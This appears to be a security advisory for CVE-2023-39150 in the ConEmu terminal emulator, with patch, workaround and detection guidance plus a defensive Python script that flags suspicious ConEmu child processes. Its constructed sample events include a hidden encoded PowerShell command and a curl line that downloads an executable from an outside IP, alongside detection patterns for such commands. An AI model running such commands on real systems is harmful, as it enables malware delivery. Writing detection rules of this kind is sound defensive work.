CVE-2023-39150

9.8 CRITICAL

📋 TL;DR

CVE-2023-39150 is a critical vulnerability in the ConEmu terminal emulator: title responses containing control characters are not properly sanitized, which could allow arbitrary code execution. It affects users running ConEmu builds before commit 230724 (July 24, 2023). The vulnerability stems from an incomplete fix for the previously disclosed CVE-2022-46387.

💻 Affected Systems

Products:
  • ConEmu
Versions: All versions before commit 60683a186628ffaa7689fcb64b3c38ced69287c1 (July 24, 2023)
Operating Systems: Windows
Default Config Vulnerable: ⚠️ Yes
Notes: The vulnerability affects ConEmu when processing terminal title responses, which can occur during normal terminal operations including SSH sessions and remote connections.

⚠️ Risk & Real-World Impact

🔴

Worst Case

Full system compromise with attacker gaining complete control over the affected system, potentially leading to data theft, ransomware deployment, or lateral movement within the network.

🟠

Likely Case

Remote code execution with the privileges of the ConEmu user, allowing attackers to install malware, steal credentials, or pivot to other systems.

🟢

If Mitigated

Limited impact if proper network segmentation and least privilege principles are implemented, potentially containing the attack to isolated segments.

🌐 Internet-Facing: MEDIUM
🏢 Internal Only: HIGH

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: LIKELY
Unauthenticated Exploit: ⚠️ Yes
Complexity: LOW

The vulnerability is related to a previously disclosed CVE (CVE-2022-46387) with known exploitation patterns, making weaponization likely. The public gist provides technical details that could facilitate exploit development.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Commit 60683a186628ffaa7689fcb64b3c38ced69287c1 or later (July 24, 2023+)

Vendor Advisory: https://github.com/Maximus5/ConEmu/commit/60683a186628ffaa7689fcb64b3c38ced69287c1

Restart Required: Yes

Instructions:

1. Download the latest ConEmu release from the official GitHub repository.
2. Uninstall the vulnerable version.
3. Install the updated version.
4. Restart any active ConEmu sessions.

🔧 Temporary Workarounds

Disable Terminal Title Updates

Platform: Windows

Prevents ConEmu from processing terminal title responses, which could contain malicious control characters.

Set 'Features' -> 'ANSI X3.64' to 'Disable' in ConEmu settings

Use Alternative Terminal

Platform: Windows

Temporarily switch to Windows Terminal, PowerShell, or cmd.exe until ConEmu is patched.

🧯 If You Can't Patch

  • Network segmentation: Isolate systems running vulnerable ConEmu versions from critical assets
  • Application control: Restrict execution of unauthorized binaries to limit post-exploitation capabilities

🔍 How to Verify

Check if Vulnerable:

Check ConEmu version in Help -> About dialog. If build date is before July 24, 2023, the system is vulnerable.

Check Version:

conemu64.exe --version or check Help -> About in the ConEmu interface

Verify Fix Applied:

Verify ConEmu version shows build date July 24, 2023 or later in Help -> About dialog.

📡 Detection & Monitoring

Log Indicators:

  • Unusual process creation from ConEmu.exe
  • Suspicious command execution patterns in terminal sessions
  • Anomalous network connections originating from ConEmu processes

Network Indicators:

  • Unexpected outbound connections from ConEmu to external IPs
  • DNS queries for known malicious domains from ConEmu processes

SIEM Query:

Process Creation where ParentImage contains 'ConEmu.exe' AND (CommandLine contains 'powershell' OR CommandLine contains 'cmd.exe /c' OR CommandLine contains unusual patterns)
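The query above is written in SIEM pseudo-syntax. Below is an added, offline Python version of the same logic (not part of this advisory and not ConEmu project code) run over constructed Sysmon-style process-creation events. It adds one caveat a defender needs: ConEmu's job is to host shells, so a rule that fires on every cmd.exe or powershell.exe child of ConEmu alerts on every normal session. The example therefore allowlists the expected hosted-shell command line (a constructed value, tune it to your configured ConEmu task) and treats encoded PowerShell and URLs in the command line as the query's "unusual patterns" (my assumption about what that phrase covers). The parent image name ConEmu64.exe is also an assumption; the page names only ConEmu.exe.

```python
import re
from typing import Dict, Iterable, List

# Parent process names to watch. ConEmu.exe comes from the advisory's query;
# ConEmu64.exe is assumed for 64-bit installs.
CONEMU_PARENTS = ("conemu.exe", "conemu64.exe")

# Patterns from the advisory's query plus two assumed "unusual patterns":
# encoded PowerShell arguments and URLs embedded in the command line.
SUSPICIOUS = [
    ("powershell", re.compile(r"powershell", re.I)),
    ("cmd.exe /c", re.compile(r"cmd\.exe\s+/c", re.I)),
    ("encoded-powershell", re.compile(r"\s-(enc|encodedcommand)\b", re.I)),
    ("url-in-cmdline", re.compile(r"https?://", re.I)),
]

# Command lines a plain ConEmu session is expected to spawn as its hosted shell.
# Constructed allowlist; replace with the command lines of your ConEmu tasks.
EXPECTED_SHELLS = {r'"C:\Windows\System32\cmd.exe"'}

# Constructed sample events shaped like Sysmon Event ID 1 fields.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Tools\ConEmu\ConEmu64.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'"C:\Windows\System32\cmd.exe"'},           # normal hosted shell
    {"ParentImage": r"C:\Tools\ConEmu\ConEmu64.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -nop -w hidden -enc BASE64_PLACEHOLDER"},
    {"ParentImage": r"C:\Tools\ConEmu\ConEmu64.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c curl http://203.0.113.5/x.exe -o %TEMP%\x.exe"},
    {"ParentImage": r"C:\Windows\explorer.exe",                  # not a ConEmu child
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -nop -w hidden"},
]


def is_conemu_child(event: Dict[str, str]) -> bool:
    """True when the event's parent image file name is a ConEmu binary."""
    parent = event.get("ParentImage", "").rsplit("\\", 1)[-1].lower()
    return parent in CONEMU_PARENTS


def matched_rules(cmdline: str) -> List[str]:
    """Names of the SUSPICIOUS patterns that match the command line."""
    return [name for name, pattern in SUSPICIOUS if pattern.search(cmdline)]


def triage(events: Iterable[Dict[str, str]]) -> List[Dict[str, object]]:
    """Apply the advisory's query: ConEmu child processes whose command line
    looks suspicious, minus the allowlisted expected shell launch."""
    hits = []
    for ev in events:
        if not is_conemu_child(ev):
            continue
        cmd = ev.get("CommandLine", "")
        if cmd in EXPECTED_SHELLS:
            continue  # baseline: ConEmu starting its configured shell
        rules = matched_rules(cmd)
        if rules:
            hits.append({"Image": ev.get("Image", ""), "CommandLine": cmd, "rules": rules})
    return hits


if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(f"ALERT {hit['Image']}  rules={hit['rules']}\n      {hit['CommandLine']}")
```

Run against the constructed events, the allowlisted shell launch and the explorer.exe child are ignored, and the two remaining ConEmu children are reported with the rules they matched. In production, feed it your endpoint telemetry's ParentImage/CommandLine fields and widen EXPECTED_SHELLS to the shells your ConEmu tasks actually launch, otherwise the rule stays as noisy as the pseudo-query.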
